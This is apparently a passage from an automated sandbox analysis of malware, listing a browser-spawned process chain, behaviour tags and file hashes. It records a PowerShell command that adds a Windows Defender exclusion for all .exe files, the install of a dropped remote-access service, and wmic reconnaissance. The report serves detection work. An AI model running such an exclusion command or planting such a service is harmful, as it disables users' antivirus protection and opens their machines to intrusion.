C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4016 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"4⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5072 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell "Add-MpPreference -ExclusionExtension '.exe' -Force"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:1904 -
C:\Users\Admin\AppData\Local\naver\naver.exeC:\Users\Admin\AppData\Local\naver\naver.exe -install5⤵
- Sets service image path in registry
- Executes dropped EXE
PID:1768
-
C:\Users\Admin\AppData\Local\naver\naver.exe"C:\Users\Admin\AppData\Local\naver\naver.exe" --meshServiceName="naver Service"1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of WriteProcessMemory
PID:1876 -
C:\Windows\System32\wbem\wmic.exewmic SystemEnclosure get ChassisTypes2⤵
- Suspicious use of AdjustPrivilegeToken
PID:716 -
C:\Windows\system32\wbem\wmic.exewmic os get oslanguage /FORMAT:LIST2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4224 -
C:\Windows\System32\wbem\wmic.exewmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4864 -
C:\Windows\system32\wbem\wmic.exewmic os get oslanguage /FORMAT:LIST2⤵PID:4592
-
C:\Windows\System32\wbem\wmic.exewmic SystemEnclosure get ChassisTypes2⤵PID:4284
-
C:\Windows\System32\wbem\wmic.exewmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"2⤵PID:988
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -noprofile -nologo -command -2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2848
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD52f57fde6b33e89a63cf0dfdd6e60a351
SHA1445bf1b07223a04f8a159581a3d37d630273010f
SHA2563b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA51242857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220
-
Filesize
1KB
MD5e89c193840c8fb53fc3de104b1c4b092
SHA18b41b6a392780e48cc33e673cf4412080c42981e
SHA256920b0533da0c372d9d48d36e09d752c369aec8f67c334e98940909bfcb6c0e6c
SHA512865667a22e741c738c62582f0f06ea4559bb63a1f0410065c6fb3da80667582697aba2e233e91068c02d9ab4fb5db282a681fe8234f4c77a5309b689a37ac3a2
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
5.3MB
MD534ea939943d6809e2a7058a2e45c8add
SHA163a80e2dc69179e51234ba962b3cc66b8a9a8597
SHA25654db74abc8fd588cf08c0411d052fff4e81b4235d5326c2fd9dbb94152636a84
SHA512e3732baaac1d8840b3a8a9a55b728a859f4aefe86a1ba162acaf4418c14224fd77c8f7ca4a294f6cbeaa5a03724d016760169fec6c735fcc0af95d0d98deb35e
-
Filesize
22KB
MD52dd515ea546a81398d94dd15e3b4d55c
SHA1eb0b0fca721a296906166b7e972559b87353b726
SHA256becc832e6028a35aa50af95a2d80bcccbf0fcc8e9d1a333cd0661a77bdf089b2
SHA512439b241e56783b766c70aaacfc2efe59b1136cc8e0e5377e606697d0b3048be6787a0a2ce2a549a294633dda8a39f02f2f457d999ce2ec22f74ef07daf912dfb